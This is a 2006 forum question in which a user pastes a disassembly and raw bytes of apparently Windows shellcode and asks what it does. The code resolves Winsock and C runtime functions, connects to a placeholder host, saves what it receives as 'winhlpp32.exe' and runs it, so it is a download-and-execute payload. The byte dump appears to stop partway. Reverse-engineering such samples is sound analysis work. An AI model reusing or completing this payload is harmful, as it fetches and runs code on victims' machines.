Anyone can give some instructions on the function of this asm?

changs · Mar 2, 2006

Hi, all

I have a asm code, I suspect it sort of socket programming. Can anyone
here give some instructions on how to determine the function or give
the psudo-code in C?

Thanks in advance!

Tony

The code is here. Actually, the original code is binary code, I
decompile it. I also attach the origin binary code after the asm code.

ASM code
0xbf9784fe: jmp 0xbf978662
0xbf978503: pop %ebx
0xbf978504: push %esi
0xbf978505: push %edi
0xbf978506: push %eax
0xbf978507: call 0xbf9788bf
0xbf97850c: lea 0x9f(%ebx),%esi
0xbf978512: lea 0xa8(%ebx),%edi
0xbf978518: movl $0xf,0x1a7(%ebx)
0xbf978522: call 0xbf97882e
0xbf978527: mov %eax,0xf4(%ebx)
0xbf97852d: lea 0xb7(%ebx),%edi
0xbf978533: movl $0xd,0x1a7(%ebx)
0xbf97853d: call 0xbf97882e
0xbf978542: mov %eax,0xf0(%ebx)
0xbf978548: lea 0xc4(%ebx),%edi
0xbf97854e: call 0xbf978816
0xbf978553: mov %eax,0xe4(%ebx)
0xbf978559: lea 0xca(%ebx),%edi
0xbf97855f: call 0xbf978816
0xbf978564: mov %eax,0xe8(%ebx)
0xbf97856a: lea 0xd5(%ebx),%edi
0xbf978570: call 0xbf978816
0xbf978575: mov %eax,0xec(%ebx)
0xbf97857b: lea 0xa(%ebx),%esi
0xbf978581: lea 0x11(%ebx),%edi
0xbf978587: call 0xbf978816
0xbf97858c: mov %eax,0x41(%ebx)
0xbf978592: lea 0x1c(%ebx),%edi
0xbf978598: call 0xbf978816
0xbf97859d: mov %eax,0x45(%ebx)
0xbf9785a3: lea 0x23(%ebx),%edi
0xbf9785a9: call 0xbf978816
0xbf9785ae: mov %eax,0x49(%ebx)
0xbf9785b4: lea 0x2b(%ebx),%edi
0xbf9785ba: call 0xbf978816
0xbf9785bf: mov %eax,0x4d(%ebx)
0xbf9785c5: lea 0x30(%ebx),%edi
0xbf9785cb: call 0xbf978816
0xbf9785d0: mov %eax,0x51(%ebx)
0xbf9785d6: lea 0x35(%ebx),%edi
0xbf9785dc: call 0xbf978816
0xbf9785e1: mov %eax,0x55(%ebx)
0xbf9785e7: lea 0x59(%ebx),%esi
0xbf9785ed: lea 0x60(%ebx),%edi
0xbf9785f3: call 0xbf978816
0xbf9785f8: mov %eax,0x87(%ebx)
0xbf9785fe: lea 0x66(%ebx),%edi
0xbf978604: call 0xbf978816
0xbf978609: mov %eax,0x8b(%ebx)
0xbf97860f: lea 0x6d(%ebx),%edi
0xbf978615: call 0xbf978816
0xbf97861a: mov %eax,0x8f(%ebx)
0xbf978620: lea 0x74(%ebx),%edi
0xbf978626: call 0xbf978816
0xbf97862b: mov %eax,0x93(%ebx)
0xbf978631: lea 0x7b(%ebx),%edi
0xbf978637: call 0xbf978816
0xbf97863c: mov %eax,0x97(%ebx)
0xbf978642: lea 0x82(%ebx),%edi
0xbf978648: call 0xbf978816
0xbf97864d: mov %eax,0x9b(%ebx)
0xbf978653: push %ebx
0xbf978654: call 0xbf978944
0xbf978659: pop %ebx
0xbf97865a: pop %eax
0xbf97865b: pop %edi
0xbf97865c: pop %esi
0xbf97865d: call 0xbf978b72
0xbf978662: call 0xbf978503
0xbf978667: add %al,(%eax)
0xbf978669: add %al,(%eax)
0xbf97866b: adc %edx,(%ecx)
0xbf97866d: adc %edx,(%ecx)
0xbf97866f: and (%edx),%ah
0xbf978671: ja 0xbf9786e6
0xbf978673: xor 0x33(%edi),%bl
0xbf978676: xor (%eax),%al
0xbf978678: push %edi
0xbf978679: push %ebx
0xbf97867a: inc %ecx
0xbf97867b: push %ebx
0xbf97867c: je 0xbf9786df
0xbf97867e: jb 0xbf9786f4
0xbf978680: jne 0xbf9786f2
0xbf978682: add %dh,0x6f(%ebx)
0xbf978685: arpl %bp,0x65(%ebx)
0xbf978688: je 0xbf97868a
0xbf97868a: arpl %bp,0x6e(%edi)
0xbf97868d: outsb %ds

%esi),(%dx)
0xbf97868e: arpl %si,%gs:0x72(%eax,%eax,1)
0xbf978693: arpl %si,%gs:0x0(%esi)
0xbf978697: jae 0xbf9786fe
0xbf978699: outsb %ds

%esi),(%dx)
0xbf97869a: add %ah,%fs:0x6c(%ebx)
0xbf97869e: outsl %ds

%esi),(%dx)
0xbf97869f: jae 0xbf978706
0xbf9786a1: jae 0xbf978712
0xbf9786a3: arpl %bp,0x65(%ebx)
0xbf9786a6: je 0xbf9786a8
0xbf9786a8: add %al,(%eax)
0xbf9786aa: add %al,(%eax)
0xbf9786ac: add %al,(%eax)
0xbf9786ae: add %al,(%eax)
0xbf9786b0: add %al,(%eax)
0xbf9786b2: add %al,(%eax)
0xbf9786b4: add %al,(%eax)
0xbf9786b6: add %al,(%eax)
0xbf9786b8: add %al,(%eax)
0xbf9786ba: add %al,(%eax)
0xbf9786bc: add %al,(%eax)
0xbf9786be: add %al,(%eax)
0xbf9786c0: insl (%dx),%es

%edi)
0xbf9786c1: jae 0xbf978739
0xbf9786c3: arpl %si,0x74(%edx)
0xbf9786c6: add %ah,0x6f(%esi)
0xbf9786c9: jo 0xbf978730
0xbf9786cb: outsb %ds

%esi),(%dx)
0xbf9786cc: add %ah,0x63(%esi)
0xbf9786cf: insb (%dx),%es

%edi)
0xbf9786d0: outsl %ds

%esi),(%dx)
0xbf9786d1: jae 0xbf978738
0xbf9786d3: add %ah,0x77(%esi)
0xbf9786d6: jb 0xbf978741
0xbf9786d8: je 0xbf97873f
0xbf9786da: add %ch,0x65(%ebp)
0xbf9786dd: insl (%dx),%es

%edi)
0xbf9786de: jae 0xbf978745
0xbf9786e0: je 0xbf9786e2
0xbf9786e2: insl (%dx),%es

%edi)
0xbf9786e3: popa
0xbf9786e4: insb (%dx),%es

%edi)
0xbf9786e5: insb (%dx),%es

%edi)
0xbf9786e6: outsl %ds

%esi),(%dx)
0xbf9786e7: arpl %ax,(%eax)
0xbf9786e9: data16
0xbf9786ea: jb 0xbf978751
0xbf9786ec: add %al,%gs

%eax)
0xbf9786ef: add %al,(%eax)
0xbf9786f1: add %al,(%eax)
0xbf9786f3: add %al,(%eax)
0xbf9786f5: add %al,(%eax)
0xbf9786f7: add %al,(%eax)
0xbf9786f9: add %al,(%eax)
0xbf9786fb: add %al,(%eax)
0xbf9786fd: add %al,(%eax)
0xbf9786ff: add %al,(%eax)
0xbf978701: add %al,(%eax)
0xbf978703: add %al,(%eax)
0xbf978705: add %ch,0x65(%ebx)
0xbf978708: jb 0xbf978778
0xbf97870a: gs
0xbf97870b: insb (%dx),%es

%edi)
0xbf97870c: xor (%edx),%esi
0xbf97870e: add %al,0x65(%edi)
0xbf978711: je 0xbf978763
0xbf978713: jb 0xbf978784
0xbf978715: arpl %ax,0x64(%ecx)
0xbf978718: fs
0xbf978719: jb 0xbf978780
0xbf97871b: jae 0xbf978790
0xbf97871d: add %cl,0x61(%edi,%ebp,2)
0xbf978721: fs
0xbf978722: dec %esp
0xbf978723: imul $0x41797261,0x72(%edx),%esp
0xbf97872a: add %dl,0x6c(%ebx)
0xbf97872d: gs
0xbf97872e: gs
0xbf97872f: jo 0xbf978731
0xbf978731: inc %ebp
0xbf978732: js 0xbf97879d
0xbf978734: je 0xbf97878a
0xbf978736: push $0x64616572
0xbf97873b: add %al,0x72(%ebx)
0xbf97873e: gs
0xbf97873f: popa
0xbf978740: je 0xbf9787a7
0xbf978742: push %eax
0xbf978743: jb 0xbf9787b4
0xbf978745: arpl %sp,0x73(%ebp)
0xbf978748: jae 0xbf97878b
0xbf97874a: add %al,(%eax)
0xbf97874c: add %al,(%eax)
0xbf97874e: add %al,(%eax)
0xbf978750: add %al,(%eax)
0xbf978752: add %al,(%eax)
0xbf978754: add %al,(%eax)
0xbf978756: add %al,(%eax)
0xbf978758: add %al,(%eax)
0xbf97875a: add %al,(%eax)
0xbf97875c: add %al,(%eax)
0xbf97875e: add %al,(%eax)
0xbf978760: add %al,(%eax)
0xbf978762: add %al,(%eax)
0xbf978764: add %al,(%eax)
0xbf978766: add %al,(%eax)
0xbf978768: add %al,(%eax)
0xbf97876a: add %al,(%eax)
0xbf97876c: add %al,(%eax)
0xbf97876e: add %al,(%eax)
0xbf978770: add %al,(%eax)
0xbf978772: add %al,(%eax)
0xbf978774: add %al,(%eax)
0xbf978776: add %al,(%eax)
0xbf978778: add %al,(%eax)
0xbf97877a: add %al,(%eax)
0xbf97877c: add %al,(%eax)
0xbf97877e: add %al,(%eax)
0xbf978780: add %al,(%eax)
0xbf978782: add %al,0x0(%eax,%eax,1)
0xbf978786: add %al,(%eax)
0xbf978788: add %al,(%eax)
0xbf97878a: add %al,(%eax)
0xbf97878c: add %al,(%eax)
0xbf97878e: add %al,(%eax)
0xbf978790: add %al,(%eax)
0xbf978792: add %al,(%eax)
0xbf978794: add %al,(%eax)
0xbf978796: add %al,(%eax)
0xbf978798: add %al,(%eax)
0xbf97879a: add %al,(%eax)
0xbf97879c: add %al,(%eax)
0xbf97879e: add %al,(%eax)
0xbf9787a0: add %al,(%eax)
0xbf9787a2: add %al,(%eax)
0xbf9787a4: add %al,(%eax)
0xbf9787a6: add %al,(%eax)
0xbf9787a8: add %al,(%eax)
0xbf9787aa: add %al,(%eax)
0xbf9787ac: add %al,(%eax)
0xbf9787ae: add %al,(%eax)
0xbf9787b0: add %al,(%eax)
0xbf9787b2: add %al,(%eax)
0xbf9787b4: add %al,(%eax)
0xbf9787b6: add %al,(%eax)
0xbf9787b8: add %al,(%eax)
0xbf9787ba: add %al,(%eax)
0xbf9787bc: add %al,(%eax)
0xbf9787be: add %al,(%eax)
0xbf9787c0: add %al,(%eax)
0xbf9787c2: add %al,(%eax)
0xbf9787c4: add %al,(%eax)
0xbf9787c6: add %al,(%eax)
0xbf9787c8: add %al,(%eax)
0xbf9787ca: add %dh,0x2b(%edi)
0xbf9787cd: bound %eax,(%eax)
0xbf9787cf: add %al,(%eax)
0xbf9787d1: add %al,(%eax)
0xbf9787d3: ja 0xbf97883e
0xbf9787d5: outsb %ds

%esi),(%dx)
0xbf9787d6: push $0x3370706c
0xbf9787db: xor (%esi),%ch
0xbf9787dd: gs
0xbf9787de: js 0xbf978845
0xbf9787e0: add %ch,0x70(%edi)
0xbf9787e3: outsb %gs

%esi),(%dx)
0xbf9787e5: add %dl,(%esi)
0xbf9787e7: add %al,(%eax)
0xbf9787e9: add %al,(%eax)
0xbf9787eb: add %al,(%eax)
0xbf9787ed: add %al,(%eax)
0xbf9787ef: add %al,(%eax)
0xbf9787f1: add %al,(%eax)
0xbf9787f3: add %al,(%eax)
0xbf9787f5: add %al,(%eax)
0xbf9787f7: add %al,(%eax)
0xbf9787f9: add %al,(%eax)
0xbf9787fb: add %al,(%eax)
0xbf9787fd: add %al,(%eax)
0xbf9787ff: add %al,(%eax)
0xbf978801: add %al,(%eax)
0xbf978803: add %al,(%eax)
0xbf978805: add %al,(%eax)
0xbf978807: add %al,(%eax)
0xbf978809: add %al,(%eax)
0xbf97880b: add %al,(%eax)
0xbf97880d: add %al,(%eax)
0xbf97880f: add %al,(%eax)
0xbf978811: add %al,(%eax)
0xbf978813: add %al,(%eax)
0xbf978815: add %dl,0x57(%ecx)
0xbf978818: push %esi
0xbf978819: push %esi
0xbf97881a: call *0xf0(%ebx)
0xbf978820: push %eax
0xbf978821: pop %ecx
0xbf978822: push %edi
0xbf978823: push %ecx
0xbf978824: call *0xf4(%ebx)
0xbf97882a: pop %esi
0xbf97882b: pop %edi
0xbf97882c: pop %ecx
0xbf97882d: ret
0xbf97882e: xor %eax,%eax
0xbf978830: mov %eax,0x1a3(%ebx)
0xbf978836: mov 0x1a3(%ebx),%edx
0xbf97883c: cmp 0x193(%ebx),%edx
0xbf978842: jge 0xbf9788a7
0xbf978844: inc %edx
0xbf978845: mov %edx,0x1a3(%ebx)
0xbf97884b: xor %eax,%eax
0xbf97884d: mov 0x1a3(%ebx),%eax
0xbf978853: shl $0x2,%eax
0xbf978856: mov 0x19b(%ebx),%ecx
0xbf97885c: add %eax,%ecx
0xbf97885e: mov (%ecx),%eax
0xbf978860: add 0x18f(%ebx),%eax
0xbf978866: push %edi
0xbf978867: push %esi
0xbf978868: push %ecx
0xbf978869: mov %edi,%esi
0xbf97886b: mov %eax,%edi
0xbf97886d: mov 0x1a7(%ebx),%ecx
0xbf978873: repz cmpsb %es

%edi),%ds

%esi)
0xbf978875: pop %ecx
0xbf978876: pop %esi
0xbf978877: pop %edi
0xbf978878: jne 0xbf978836
0xbf97887a: xor %eax,%eax
0xbf97887c: mov 0x1a3(%ebx),%eax
0xbf978882: shl %eax
0xbf978884: mov 0x19f(%ebx),%ecx
0xbf97888a: add %eax,%ecx
0xbf97888c: xor %eax,%eax
0xbf97888e: mov (%ecx),%ax
0xbf978891: shl $0x2,%eax
0xbf978894: mov 0x197(%ebx),%ecx
0xbf97889a: add %ecx,%eax
0xbf97889c: mov (%eax),%ecx
0xbf97889e: add 0x18f(%ebx),%ecx
0xbf9788a4: mov %ecx,%eax
0xbf9788a6: ret
0xbf9788a7: xor %eax,%eax
0xbf9788a9: ret
0xbf9788aa: jmp 0xbf978b77
0xbf9788af: mov %ds:0x34(%eax),%eax
0xbf9788b3: mov %ds:0xb8(%eax),%ebp
0xbf9788ba: jmp 0xbf9788cd
0xbf9788bf: push %eax
0xbf9788c0: push %ecx
0xbf9788c1: push %esi
0xbf9788c2: push %ebp
0xbf9788c3: mov %fs:0x30,%eax
0xbf9788c9: test %eax,%eax
0xbf9788cb: js 0xbf9788af
0xbf9788cd: mov %ds:0xc(%eax),%eax
0xbf9788d1: mov %ds:0x1c(%eax),%esi
0xbf9788d5: lods %ds

%esi),%eax
0xbf9788d6: mov %ds:0x8(%eax),%ebp
0xbf9788da: mov %ebp,0x18f(%ebx)
0xbf9788e0: mov %ebp,%eax
0xbf9788e2: cmpw $0x5a4d,(%eax)
0xbf9788e7: jne 0xbf9788aa
0xbf9788e9: add $0x3c,%eax
0xbf9788ee: mov (%eax),%ecx
0xbf9788f0: add 0x18f(%ebx),%ecx
0xbf9788f6: cmpw $0x4550,(%ecx)
0xbf9788fb: jne 0xbf9788aa
0xbf9788fd: add $0x78,%ecx
0xbf978903: mov (%ecx),%esi
0xbf978905: add 0x18f(%ebx),%esi
0xbf97890b: add $0x18,%esi
0xbf978911: lods %ds

%esi),%eax
0xbf978912: mov %eax,0x193(%ebx)
0xbf978918: lods %ds

%esi),%eax
0xbf978919: add 0x18f(%ebx),%eax
0xbf97891f: mov %eax,0x197(%ebx)
0xbf978925: lods %ds

%esi),%eax
0xbf978926: add 0x18f(%ebx),%eax
0xbf97892c: mov %eax,0x19b(%ebx)
0xbf978932: lods %ds

%esi),%eax
0xbf978933: add 0x18f(%ebx),%eax
0xbf978939: mov %eax,0x19f(%ebx)
0xbf97893f: pop %ebp
0xbf978940: pop %esi
0xbf978941: pop %ecx
0xbf978942: pop %eax
0xbf978943: ret
0xbf978944: push %eax
0xbf978945: mov $0x400,%eax
0xbf97894a: call 0xbf978ac0
0xbf97894f: cmp $0x0,%eax
0xbf978954: je 0xbf978944
0xbf97895a: mov %eax,0x183(%ebx)
0xbf978960: pop %eax
0xbf978961: mov 0x183(%ebx),%edx
0xbf978967: push %edx
0xbf978968: push $0x101
0xbf97896d: call *%ds:0x41(%ebx)
0xbf978971: cmp $0x0,%eax
0xbf978976: jne 0xbf978961
0xbf97897c: push $0x6
0xbf978981: push $0x1
0xbf978986: push $0x2
0xbf97898b: call *%ds:0x45(%ebx)
0xbf97898f: cmp $0xffffffff,%eax
0xbf978994: je 0xbf97897c
0xbf97899a: mov %eax,0xf8(%ebx)
0xbf9789a0: push %edi
0xbf9789a1: push %eax
0xbf9789a2: push %ebx
0xbf9789a3: lea 0x17f(%ebx),%edx
0xbf9789a9: movb $0x16,(%edx)
0xbf9789ac: push %edx
0xbf9789ad: lea 0xfc(%ebx),%edx
0xbf9789b3: movw $0x2,(%edx)
0xbf9789b8: mov 0x8(%ebx),%di
0xbf9789bc: mov %di,0x2(%edx)
0xbf9789c0: mov 0x4(%ebx),%edi
0xbf9789c3: mov %edi,0x4(%edx)
0xbf9789c6: push %edx
0xbf9789c7: mov 0xf8(%ebx),%eax
0xbf9789cd: push %eax
0xbf9789ce: call *%ds:0x49(%ebx)
0xbf9789d2: cmp $0x0,%eax
0xbf9789d7: jl 0xbf9789a3
0xbf9789dd: pop %ebx
0xbf9789de: pop %eax
0xbf9789df: pop %edi
0xbf9789e0: push %eax
0xbf9789e1: mov $0x1000,%eax
0xbf9789e6: call 0xbf978ac0
0xbf9789eb: cmp $0x0,%eax
0xbf9789f0: je 0xbf9789e0
0xbf9789f6: mov %eax,0x160(%ebx)
0xbf9789fc: pop %eax
0xbf9789fd: call 0xbf978a3b
0xbf978a02: call 0xbf978adf
0xbf978a07: call 0xbf978a63
0xbf978a0c: call 0xbf978b30
0xbf978a11: ret
0xbf978a12: mov 0xf8(%ebx),%eax
0xbf978a18: push %eax
0xbf978a19: call *%ds:0x55(%ebx)
0xbf978a1d: mov 0x1ab(%ebx),%eax
0xbf978a23: inc %eax
0xbf978a24: mov %eax,0x1ab(%ebx)
0xbf978a2a: cmp $0x5,%eax
0xbf978a2f: je 0xbf978a3a
0xbf978a35: jmp 0xbf97897c
0xbf978a3a: ret
0xbf978a3b: push $0x0
0xbf978a40: push $0x4
0xbf978a45: lea 0x187(%ebx),%edx
0xbf978a4b: push %edx
0xbf978a4c: mov 0xf8(%ebx),%edx
0xbf978a52: push %edx
0xbf978a53: call *%ds:0x4d(%ebx)
0xbf978a57: cmp $0x1,%eax
0xbf978a5c: jl 0xbf978a12
0xbf978a62: ret
0xbf978a63: push %edi
0xbf978a64: push %esi
0xbf978a65: mov 0x187(%ebx),%edi
0xbf978a6b: mov 0x18b(%ebx),%esi
0xbf978a71: cmp %esi,%edi
0xbf978a73: pop %esi
0xbf978a74: pop %edi
0xbf978a75: je 0xbf978aad
0xbf978a7b: push $0x0
0xbf978a80: push $0x1000
0xbf978a85: mov 0x160(%ebx),%edx
0xbf978a8b: push %edx
0xbf978a8c: mov 0xf8(%ebx),%edx
0xbf978a92: push %edx
0xbf978a93: call *%ds:0x4d(%ebx)
0xbf978a97: cmp $0x1,%eax
0xbf978a9c: jl 0xbf978a12
0xbf978aa2: add %eax,0x18b(%ebx)
0xbf978aa8: jmp 0xbf978afd
0xbf978aad: call 0xbf978b20
0xbf978ab2: push %eax
0xbf978ab3: mov 0xf8(%ebx),%eax
0xbf978ab9: push %eax
0xbf978aba: call *%ds:0x55(%ebx)
0xbf978abe: pop %eax
0xbf978abf: ret
0xbf978ac0: mov %eax,%edi
0xbf978ac2: push %eax
0xbf978ac3: call *%ds:0x97(%ebx)
0xbf978aca: pop %edi
0xbf978acb: push %eax
0xbf978acc: push %edi
0xbf978acd: push $0x0
0xbf978ad2: push %eax
0xbf978ad3: call *%ds:0x93(%ebx)
0xbf978ada: pop %edi
0xbf978adb: pop %edi
0xbf978adc: pop %edi
0xbf978add: pop %eax
0xbf978ade: ret
0xbf978adf: lea 0x164(%ebx),%edx
0xbf978ae5: push %edx
0xbf978ae6: lea 0x16c(%ebx),%edx
0xbf978aec: push %edx
0xbf978aed: call *%ds:0x87(%ebx)
0xbf978af4: pop %edi
0xbf978af5: pop %edi
0xbf978af6: mov %eax,0x168(%ebx)
0xbf978afc: ret
0xbf978afd: pushl 0x168(%ebx)
0xbf978b03: push %eax
0xbf978b04: push $0x1
0xbf978b09: mov 0x160(%ebx),%edx
0xbf978b0f: push %edx
0xbf978b10: call *%ds:0x8f(%ebx)
0xbf978b17: pop %edi
0xbf978b18: pop %edi
0xbf978b19: pop %edi
0xbf978b1a: pop %edi
0xbf978b1b: jmp 0xbf978a63
0xbf978b20: mov 0x168(%ebx),%edx
0xbf978b26: push %edx
0xbf978b27: call *%ds:0x8b(%ebx)
0xbf978b2e: pop %edi
0xbf978b2f: ret
0xbf978b30: push %eax
0xbf978b31: lea 0x10c(%ebx),%eax
0xbf978b37: push %eax
0xbf978b38: lea 0x11c(%ebx),%eax
0xbf978b3e: push %eax
0xbf978b3f: push $0x0
0xbf978b44: push $0x0
0xbf978b49: push $0x28
0xbf978b4e: push $0x0
0xbf978b53: push $0x0
0xbf978b58: push $0x0
0xbf978b5d: lea 0x16c(%ebx),%eax
0xbf978b63: push %eax
0xbf978b64: push $0x0
0xbf978b69: call *%ds:0xec(%ebx)
0xbf978b70: pop %eax
0xbf978b71: ret
0xbf978b72: call 0xbf978b20
0xbf978b77: push $0x0
0xbf978b7c: call *0xe8(%ebx)
0xbf978b82: nop

binary code
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x31\xC9\x66\xB9\xFF\xFF"
"\x80\x73\x0E\xFF\x43\xE2\xF9"
"\xE9\x5F\x01\x00\x00\x5B\x56\x57\x50\xE8\xB3\x03\x00\x00\x8D"
"\xB3\x9F\x00\x00\x00\x8D\xBB\xA8\x00\x00\x00\xC7\x83\xA7\x01\x00"
"\x00\x0F\x00\x00\x00\xE8\x07\x03\x00\x00\x89\x83\xF4\x00\x00\x00"
"\x8D\xBB\xB7\x00\x00\x00\xC7\x83\xA7\x01\x00\x00\x0D\x00\x00\x00"
"\xE8\xEC\x02\x00\x00\x89\x83\xF0\x00\x00\x00\x8D\xBB\xC4\x00\x00"
"\x00\xE8\xC3\x02\x00\x00\x89\x83\xE4\x00\x00\x00\x8D\xBB\xCA\x00"
"\x00\x00\xE8\xB2\x02\x00\x00\x89\x83\xE8\x00\x00\x00\x8D\xBB\xD5"
"\x00\x00\x00\xE8\xA1\x02\x00\x00\x89\x83\xEC\x00\x00\x00\x8D\xB3"
"\x0A\x00\x00\x00\x8D\xBB\x11\x00\x00\x00\xE8\x8A\x02\x00\x00\x89"
"\x83\x41\x00\x00\x00\x8D\xBB\x1C\x00\x00\x00\xE8\x79\x02\x00\x00"
"\x89\x83\x45\x00\x00\x00\x8D\xBB\x23\x00\x00\x00\xE8\x68\x02\x00"
"\x00\x89\x83\x49\x00\x00\x00\x8D\xBB\x2B\x00\x00\x00\xE8\x57\x02"
"\x00\x00\x89\x83\x4D\x00\x00\x00\x8D\xBB\x30\x00\x00\x00\xE8\x46"
"\x02\x00\x00\x89\x83\x51\x00\x00\x00\x8D\xBB\x35\x00\x00\x00\xE8"
"\x35\x02\x00\x00\x89\x83\x55\x00\x00\x00\x8D\xB3\x59\x00\x00\x00"
"\x8D\xBB\x60\x00\x00\x00\xE8\x1E\x02\x00\x00\x89\x83\x87\x00\x00"
"\x00\x8D\xBB\x66\x00\x00\x00\xE8\x0D\x02\x00\x00\x89\x83\x8B\x00"
"\x00\x00\x8D\xBB\x6D\x00\x00\x00\xE8\xFC\x01\x00\x00\x89\x83\x8F"
"\x00\x00\x00\x8D\xBB\x74\x00\x00\x00\xE8\xEB\x01\x00\x00\x89\x83"
"\x93\x00\x00\x00\x8D\xBB\x7B\x00\x00\x00\xE8\xDA\x01\x00\x00\x89"
"\x83\x97\x00\x00\x00\x8D\xBB\x82\x00\x00\x00\xE8\xC9\x01\x00\x00"
"\x89\x83\x9B\x00\x00\x00\x53\xE8\xEB\x02\x00\x00\x5B\x58\x5F\x5E"
"\xE8\x10\x05\x00\x00\xE8\x9C\xFE\xFF\xFF\x00\x00\x00\x00\x11\x11"
"\x11\x11\x22\x22\x77\x73\x32\x5F\x33\x32\x00\x57\x53\x41\x53\x74"
"\x61\x72\x74\x75\x70\x00\x73\x6F\x63\x6B\x65\x74\x00\x63\x6F\x6E"
"\x6E\x65\x63\x74\x00\x72\x65\x63\x76\x00\x73\x65\x6E\x64\x00\x63"
"\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x6D\x73\x76\x63\x72\x74\x00\x66\x6F\x70\x65\x6E\x00"
"\x66\x63\x6C\x6F\x73\x65\x00\x66\x77\x72\x69\x74\x65\x00\x6D\x65"
"\x6D\x73\x65\x74\x00\x6D\x61\x6C\x6C\x6F\x63\x00\x66\x72\x65\x65"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6B\x65\x72\x6E\x65\x6C\x33"
"\x32\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73"
"\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x53\x6C"
"\x65\x65\x70\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x43"
"\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x2B"
"\x62\x00\x00\x00\x00\x00\x77\x69\x6E\x68\x6C\x70\x70\x33\x32\x2E"
"\x65\x78\x65\x00\x6F\x70\x65\x6E\x00\x16\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x57\x56\x56\xFF\x93\xF0"
"\x00\x00\x00\x50\x59\x57\x51\xFF\x93\xF4\x00\x00\x00\x5E\x5F\x59"
"\xC3\x31\xC0\x89\x83\xA3\x01\x00\x00\x8B\x93\xA3\x01\x00\x00\x3B"
"\x93\x93\x01\x00\x00\x7D\x63\x42\x89\x93\xA3\x01\x00\x00\x31\xC0"
"\x8B\x83\xA3\x01\x00\x00\xC1\xE0\x02\x8B\x8B\x9B\x01\x00\x00\x01"
"\xC1\x8B\x01\x03\x83\x8F\x01\x00\x00\x57\x56\x51\x89\xFE\x89\xC7"
"\x8B\x8B\xA7\x01\x00\x00\xF3\xA6\x59\x5E\x5F\x75\xBC\x31\xC0\x8B"
"\x83\xA3\x01\x00\x00\xD1\xE0\x8B\x8B\x9F\x01\x00\x00\x01\xC1\x31"
"\xC0\x66\x8B\x01\xC1\xE0\x02\x8B\x8B\x97\x01\x00\x00\x01\xC8\x8B"
"\x08\x03\x8B\x8F\x01\x00\x00\x89\xC8\xC3\x31\xC0\xC3\xE9\xC8\x02"
"\x00\x00\x3E\x8B\x40\x34\x3E\x8B\xA8\xB8\x00\x00\x00\xE9\x0E\x00"
"\x00\x00\x50\x51\x56\x55\x64\xA1\x30\x00\x00\x00\x85\xC0\x78\xE2"
"\x3E\x8B\x40\x0C\x3E\x8B\x70\x1C\xAD\x3E\x8B\x68\x08\x89\xAB\x8F"
"\x01\x00\x00\x89\xE8\x66\x81\x38\x4D\x5A\x75\xC1\x05\x3C\x00\x00"
"\x00\x8B\x08\x03\x8B\x8F\x01\x00\x00\x66\x81\x39\x50\x45\x75\xAD"
"\x81\xC1\x78\x00\x00\x00\x8B\x31\x03\xB3\x8F\x01\x00\x00\x81\xC6"
"\x18\x00\x00\x00\xAD\x89\x83\x93\x01\x00\x00\xAD\x03\x83\x8F\x01"
"\x00\x00\x89\x83\x97\x01\x00\x00\xAD\x03\x83\x8F\x01\x00\x00\x89"
"\x83\x9B\x01\x00\x00\xAD\x03\x83\x8F\x01\x00\x00\x89\x83\x9F\x01"
"\x00\x00\x5D\x5E\x59\x58\xC3\x50\xB8\x00\x04\x00\x00\xE8\x71\x01"
"\x00\x00\x3D\x00\x00\x00\x00\x0F\x84\xEA\xFF\xFF\xFF\x89\x83\x83"
"\x01\x00\x00\x58\x8B\x93\x83\x01\x00\x00\x52\x68\x01\x01\x00\x00"
"\x3E\xFF\x53\x41\x3D\x00\x00\x00\x00\x0F\x85\xE5\xFF\xFF\xFF\x68"
"\x06\x00\x00\x00\x68\x01\x00\x00\x00\x68\x02\x00\x00\x00\x3E\xFF"
"\x53\x45\x3D\xFF\xFF\xFF\xFF\x0F\x84\xE2\xFF\xFF\xFF\x89\x83\xF8"
"\x00\x00\x00\x57\x50\x53\x8D\x93\x7F\x01\x00\x00\xC6\x02\x16\x52"
"\x8D\x93\xFC\x00\x00\x00\x66\xC7\x02\x02\x00\x66\x8B\x7B\x08\x66"
"\x89\x7A\x02\x8B\x7B\x04\x89\x7A\x04\x52\x8B\x83\xF8\x00\x00\x00"
"\x50\x3E\xFF\x53\x49\x3D\x00\x00\x00\x00\x0F\x8C\xC6\xFF\xFF\xFF"
"\x5B\x58\x5F\x50\xB8\x00\x10\x00\x00\xE8\xD5\x00\x00\x00\x3D\x00"
"\x00\x00\x00\x0F\x84\xEA\xFF\xFF\xFF\x89\x83\x60\x01\x00\x00\x58"
"\xE8\x39\x00\x00\x00\xE8\xD8\x00\x00\x00\xE8\x57\x00\x00\x00\xE8"
"\x1F\x01\x00\x00\xC3\x8B\x83\xF8\x00\x00\x00\x50\x3E\xFF\x53\x55"
